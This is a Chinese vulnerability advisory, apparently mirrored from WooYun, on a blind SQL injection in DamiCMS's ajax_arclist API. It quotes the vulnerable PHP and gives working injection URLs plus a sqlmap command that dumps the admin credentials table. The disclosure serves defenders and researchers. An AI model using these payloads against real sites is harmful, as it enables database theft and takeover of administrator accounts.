大米CMS某处SQL盲注2

基本字段

漏洞编号：: SSV-95293

披露/发现时间：: 2014-11-01

提交时间：: 2014-11-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：: DamiCMS

漏洞作者：: xfkxfk

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-081519

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：大米CMS某处SQL盲注第二发，可直接拖库 ### 详细说明：文件/Web/Lib/Action/ApiAction.class.php ``` //万能获取数据接口 function ajax_arclist(){ $prefix = !empty($_REQUEST['prefix'])?(bool)$_REQUEST['prefix']:true; //表过滤防止泄露信息,只允许的表 if(!in_array($_REQUEST['model'],array('article','type','ad','label','link'))){exit();} if(!empty($_REQUEST['model'])){ if($prefix == true){ $model = C('DB_PREFIX').$_REQUEST['model']; } else{ $model = $_REQUEST['model']; } }else{ $model = C('DB_PREFIX').'article'; } $order =!empty($_REQUEST['order'])?$_REQUEST['order']:''; $num =!empty($_REQUEST['num'])?$_REQUEST['num']:''; $where =!empty($_REQUEST['where'])?urldecode($_REQUEST['where']):''; //使where支持条件判断,添加不等于的判断 $page=false; echo $_REQUEST['page']; if(!empty($_REQUEST['page'])) $page=(bool)$_REQUEST['page']; $pagesize =!empty($_REQUEST['pagesize'])?$_REQUEST['pagesize']:'10'; //$query =!empty($_REQUEST['sql'])?$_REQUEST['sql']:'';//太危险不用 $field =!empty($_REQUEST['field'])?$_REQUEST['field']:''; $m=new Model($model,"",false); //如果使用了分页,缓存也不生效 if($page){ import("@.ORG.Page"); //这里改成你的Page类 $count=$m->where($where)->count(); $total_page = ceil($count / $pagesize); $p = new Page($count,$pagesize); //如果使用了分页，num将不起作用 $t=$m->field($field)->where($where)->limit($p->firstRow.','.$p->listRows)->order($order)->select(); //echo $m->getLastSql(); $ret = array('total_page'=>$total_page,'data'=>$t); } //如果没有使用分页，并且没有 query if(!$page){ $ret=$m->field($field)->where($where)->order($order)->limit($num)->select(); } $this->ajaxReturn($ret,'返回信息',1); } ``` 当满足这个条件时： ``` in_array($_REQUEST['model'],array('article','type','ad','label','link')) ``` where就被赋值了 ``` $where =!empty($_REQUEST['where'])?urldecode($_REQUEST['where']):''; ``` 然后将where就带入SQL语句 ``` $count=$m->where($where)->count(); ``` 导致SQL注入 ### 漏洞证明：标准的盲注： ``` http://localhost/dami/index.php?s=/api/ajax_arclist/model/article/where/123 and 1=1 ``` [<img src="https://images.seebug.org/upload/201410/311811369eb3210bf92e5d54f56747cddf3a6a2e.png" alt="dami1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/311811369eb3210bf92e5d54f56747cddf3a6a2e.png) ``` http://localhost/dami/index.php?s=/api/ajax_arclist/model/article/where/123 and 1=2 ``` [<img src="https://images.seebug.org/upload/201410/3118115027f4df1d63dca86c846f65d2ef4c2518.png" alt="dami2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/3118115027f4df1d63dca86c846f65d2ef4c2518.png) 用SQLmap跑一下数据： ``` python sqlmap.py -u "http://10.65.20.198/dami/index.php?s=/api/ajax_arclist/model/article/where/123*" -D "dami" -T "dami_admin" --dump -v 3 ``` 管理员账户信息： [<img src="https://images.seebug.org/upload/201410/31181409dd973f7865a3b50e5e0e5ebe90252576.png" alt="dami3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/31181409dd973f7865a3b50e5e0e5ebe90252576.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-081519

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

大米CMS某处SQL盲注2

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定